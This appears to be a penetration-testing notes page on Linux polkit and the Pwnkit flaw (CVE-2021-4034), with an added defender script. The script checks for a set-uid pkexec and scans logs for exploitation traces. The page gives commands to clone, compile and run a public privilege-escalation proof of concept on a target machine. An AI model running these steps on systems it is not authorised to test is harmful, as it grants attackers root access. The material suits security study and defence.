
Polkit

PolicyKit (polkit) is an authorization service on Linux-based operating systems that decides whether unprivileged user software may ask privileged system components to carry out an action. Before a system component performs such a request, it asks polkit whether the calling program is authorized for that specific action.

Polkit works with two groups of files.

  1. actions/policies (/usr/share/polkit-1/actions)
  2. rules (/usr/share/polkit-1/rules.d)

Polkit also has local authority rules, which grant or remove additional permissions for individual users and groups. Custom rules can be placed in the directory /etc/polkit-1/localauthority/50-local.d with the file extension .pkla.

Polkit also comes with three additional programs:

  • pkexec - runs a program with the rights of another user or with root rights
  • pkaction - displays the registered actions
  • pkcheck - checks whether a process is authorized for a specific action

The most interesting tool for us, in this case, is pkexec, because it fills the same role as sudo: it runs a program with the rights of another user or of root.

```bash
pkexec -u <user> <command>
# Example:
# pkexec -u root id
```

CVE-2021-4034: Pwnkit

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

To exploit this vulnerability, we need to download a PoC (https://github.com/arthepsy/CVE-2021-4034) and compile it, either on the target system itself or on a copy of it that we have set up.

```bash
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o poc
```

Move the poc file to the target machine and execute it to escalate privileges.
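As an added example (not part of the original page), here is a small POSIX shell check a defender can run to see whether a host still has the precondition Pwnkit needs, a set-uid pkexec, and whether its logs contain the rejection messages pkexec writes when it is fed the malformed arguments and environment that exploitation attempts use. The default binary path, the function names and the sample log lines are assumptions constructed for this example.

```shell
#!/bin/sh
# Added defender-side check for CVE-2021-4034 exposure; not from the original page.
# Assumptions: pkexec is at the path given (default /usr/bin/pkexec), and the log to
# scan is any file holding syslog/journal lines (the sample below is constructed).

# Print 1 if the binary carries the set-uid bit the exploit relies on, else 0.
pkexec_is_suid() {
    bin="${1:-/usr/bin/pkexec}"
    if [ -u "$bin" ]; then echo 1; else echo 0; fi
}

# Count log lines that pkexec itself writes when it rejects unsafe argv/envp input.
# Normal pkexec use does not produce them, so any hit is worth investigating.
# (pkexec's source misspells "suspicious", hence the loose sus[a-z]+ match.)
pwnkit_log_hits() {
    grep -Ec 'pkexec\[[0-9]+\]: The value for (the SHELL variable was not found|environment variable \[[^]]*\] contains sus[a-z]+ content)' "$1" || true
}

# Constructed sample log: two pkexec rejections plus one unrelated sshd line.
write_sample_log() {
    cat > "$1" <<'EOF'
Jan 25 10:00:01 host pkexec[1234]: The value for the SHELL variable was not found the /etc/passwd file
Jan 25 10:00:01 host pkexec[1234]: The value for environment variable [XAUTHORITY] contains suscipious content
Jan 25 10:00:05 host sshd[99]: Accepted publickey for alice from 10.0.0.5 port 2222
EOF
}

# Stand-alone run: report the real binary's set-uid state and scan the sample log.
log=$(mktemp)
write_sample_log "$log"
echo "pkexec set-uid: $(pkexec_is_suid /usr/bin/pkexec)"
echo "exploit-indicator lines in sample log: $(pwnkit_log_hits "$log")"
rm -f "$log"
```

Zero hits do not prove the host was never exploited, since the messages only appear for attempts that trip pkexec's own checks. If a patched polkit package cannot be installed right away, the widely published stopgap is to drop the set-uid bit (chmod 0755 /usr/bin/pkexec), which disables pkexec until the fix is in place.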

Last update: 2025-02-23
Created: February 23, 2025 12:06:38